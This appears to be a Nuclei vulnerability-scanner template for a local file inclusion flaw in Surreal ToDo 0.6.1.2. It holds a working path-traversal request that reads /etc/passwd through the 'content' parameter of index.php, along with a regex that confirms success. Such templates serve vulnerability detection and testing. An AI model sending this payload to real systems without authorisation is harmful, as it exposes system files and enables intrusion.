id: surrealtodo-lfi

info:
  name: Surreal ToDo 0.6.1.2 - Local File Inclusion
  author: arafatansari
  severity: high
  description: |
    Surreal ToDo 0.6.1.2 is vulnerable to local file inclusion via index.php and the content parameter.
  reference:
    - https://www.exploit-db.com/exploits/45826
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
  tags: surreal,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?content=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a004730450220683fa7236b09c5ee7b7d946f0560bd8ef35205b71befd76a10c9efafbda7f148022100d5bf6d4b171a2517636646c6caac00760d530205221d83fa4debe34712dfe5b6:922c64590222798bb761d5b6d8e72950
